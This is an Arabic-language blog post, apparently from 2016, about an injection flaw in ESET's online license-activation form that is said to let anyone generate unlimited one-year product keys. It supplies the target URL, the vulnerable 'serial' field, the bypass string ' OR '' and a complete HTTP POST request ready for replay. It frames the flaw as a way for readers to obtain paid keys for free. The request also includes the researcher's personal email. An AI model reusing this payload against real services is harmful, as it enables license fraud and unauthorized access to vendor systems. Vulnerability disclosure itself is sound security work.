ثغرة تمكنك من الحصول على عدد لا متناهي من سريالات التفعيل الخاصة ببرنامج Eset Antivirus

وتستمر معاناة شركة Eset المنتجة للبرنامج الشهير ومكافح الڤيروسات Eset Antivirus وهذه المرة بثغرة من العيار الثقيل ثم اكتشافها من طرف الباحث الامني المصري محمد عبد الباسط النوبي ، الثغرة هي خطيرة من نوعها تمكنكم من عمل Generate لعدد لا متناهي من مفاتيح التفعيل لمدة سنة كاملة الخاصة بالنسخة المدفوعة للبرنامج بحيث يبلغ ثمن الاشتراك للعام الواحد ما يقارب 29 دولار أمريكي .
الثغرة تم العثور عليها على مستوى التسجيل للحصول على تفعيل البرنامج عن طريق ملئ الاسثمارة الخاصة بالبرنامج من على الموقع الرسمي للشركة وهذا ما يسمى في الواقع بتقنية Black BOX Testing .
إليكم تفاصيل الثغرة : 
[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--
النتيجة هي في كل ارسال لقيمة مضافة على المعلومات الخاصة بك داخل الاسثمارة بزيادة قيمة التخطي التي هي :‘ OR ”’ يقوم الموقع مباشرة بارسال مفتاح التفعيل لك على الايميل التي قمت بالتسجيل به مباشرة من على الموقع الرسمي للشركة وهنا تكمن الخطورة حيث يمكنك ارسال عدد لا متناهي من مفاتيح التفعيل .
 إذا كل ما سبق ذكره تم تسجيله من طرف الباحث الامني عن طريق ڤيديو للثغرة المكتشفة !
للتعرف أكثر على الباحث الأمني محمد عبد الباسط النوبي قم بزيارة هاته المقالة التعريفية الخاصة به : Mohamed A.Baset

بقلم

محمد لحلو

المدير التقني لمدونة مجتمع الأمن المعلوماتي مدون ومغرد حول مجال الأمن المعلوماتي والحماية الإلكترونية ! مهتم بكل جديد حول المجال الأمني بصفة خاصة والتقني بصفة عامة من مواليد مدينة فاس المغرب .

2016 © جميع الحقوق محفوظة
تطوير : عدنان المجدوبي